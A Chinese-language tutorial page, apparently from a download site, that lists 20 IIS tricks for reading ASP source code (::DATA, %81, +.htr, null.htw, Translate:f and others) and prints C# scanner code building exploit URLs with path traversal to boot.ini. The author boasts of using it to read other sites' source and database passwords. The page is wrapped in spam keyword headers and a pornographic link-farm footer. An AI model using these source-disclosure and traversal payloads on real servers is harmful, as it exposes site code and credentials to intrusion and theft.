日本国产亚洲-日本国产一区-日本国产一区二区三区-日本韩国欧美一区-日本韩国欧美在线-日本韩国欧美在线观看

當前位置:雨林木風下載站 > 技術開發教程 > 詳細頁面

20種看asp源碼的辦法及工具

20種看asp源碼的辦法及工具

更新時間:2022-05-01 文章作者:未知 信息來源:網絡 閱讀次數:

    眾所周知windows平臺漏洞百出,補丁一個接一個,但總是補也補不凈。我把我所知道的20種看asp源碼的方法總結了一下,并且用c#寫了個應用程序來掃描這些漏洞,發現雖然大部分的方法已經不起做用,但還是有一些漏網之魚的:),結果這兩天真看到不少站的源代碼,包括數據庫密碼,如果用access的可以把庫下載下來,而用sql server的如果不是用udl,dsn等來連接的話,也可以通過tcp/ip網絡庫連接到數據庫,為所欲為呀。先面把這20種方法列在下面:

.
%81
::DATA
%2e
%2e%41sp
+.htr
\\
longhtr
.bak
codebrws.asp
showcode.asp
null.htw
qfullhit.htw
qsumrhit.htw
query.idq
search/qfullhit.htw
search/qsumrhit.htw
iirturnh.htw
.htw
Translate:f


上邊這些漏洞前面10幾條是通過在asp文件后直接加上,如%81就是xxx.asp%81,后面這些都是通過iis自帶的例子或系統漏洞實現的,最特別的是那種translate:f方法,它直接通過瀏覽器是無法使用的,必須同服務器建立tcp/ip的socket連接,發送請求才行,具體每個漏洞如何使用,看下面,這是我那個應用程序的一部分,如果你要全部的可以到我的站點去下載。

                switch (this.cboMethod.SelectedIndex)
                {
                    case 0:          //直接讀取
                        strRequestFile = strServer + strUrl ;
                        break ;
                    case 5 :         //%2e%41sp
                        strRequestFile = strServer + strPath + strFirst
                                        + "%2e%41sp" ;
                        break ;
                    case 8 :        //longhtr
                        strRequestFile = strServer + strUrl
                             + "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                             + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                             + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;
                        break ;

                    case 10:     //codebrws.asp
                        strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
                                        + strUrl ;
                        break ;

                    case 11:    //showcode.asp
                        strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
                                        + "/msadc/../../../../boot.ini" ;
                        break;

                    case 12 :  //null.htw
                        strRequestFile = strServer + "/null.htw?CiWebHitsFile="
                                        + strUrl + "%20&CiRestriction=none&CiHiliteType=Full" ;
                        break ;
                    case 13 :  //qfullhit.htw
                        strRequestFile = strServer + "/iissamples/issamples/oop/qfullhit.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;

                    case 14 :  //qsumrhit.htw
                        strRequestFile = strServer + "/iissamples/issamples/oop/qsumrhit.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;

                    case 15 :  //query.idq
                        strRequestFile = strServer + "/query.idq?CiTemplate=/../../boot.ini"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                                        + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htx";
                        break ;

                    case 16:   //search/qfullhit.htw
                        strRequestFile = strServer + "/iissamples/exair/search/qfullhit.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;

                    case 17:   // search/qsumrhit.htw
                        strRequestFile = strServer + "/iissamples/exair/search/qsumrhit.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;
                    
                    case 18:   //iirturnh.htw
                        strRequestFile = strServer + "/iishelp/iis/misc/iirturnh.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;

                    case 19:  //.htw
                        strRequestFile = strServer + strUrl
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                                        + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full" ;
                        break ;

                    default:
                        strRequestFile = strServer + strUrl + this.cboMethod.Text ;
                }

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

主站蜘蛛池模板: 亚洲国产成人超福利久久精品 | 午夜视频高清在线aaa | a级欧美| 中文字幕一区久久久久 | 国产欧美成人一区二区三区 | 中文字幕亚洲综合久久男男 | 欧美精品videos | 国产美女精品久久久久中文 | 天天艹日日干 | 国产精品国产三级国产 | 久久手机在线视频 | 看5xxaaa免费毛片 | 亚洲第四页 | 免费观看日本视频 | 国产精品极品美女自在线观看免费 | 天天躁夜夜躁很很躁2020 | 91久久国产青草亚洲 | 国产成人精品亚洲日本在线 | 欧美 亚洲 中文字幕 | 一级久久| 天天视频国产免费入口 | 超爽人人做人人爽 | 日韩一区三区 | 欧美激情一区二区三区免费观看 | 三级视频在线看 | 国产精品激情综合久久 | 国产免费资源高清小视频在线观看 | 天天爱天天舔 | 免费女人光着全身体网站 | 亚洲国产日韩精品 | 国产精品免费综合一区视频 | 激情文学亚洲 | 亚洲午夜久久久久久91 | 青草操| 91精品手机国产在线观 | 97久视频精品视频在线老司机 | 亚洲国产精品一区二区三区久久 | 国产日韩亚洲欧洲一区二区三区 | 欧美一区二区三区精品国产 | 国产福利福利视频 | 欧美日韩一区二区三区麻豆 |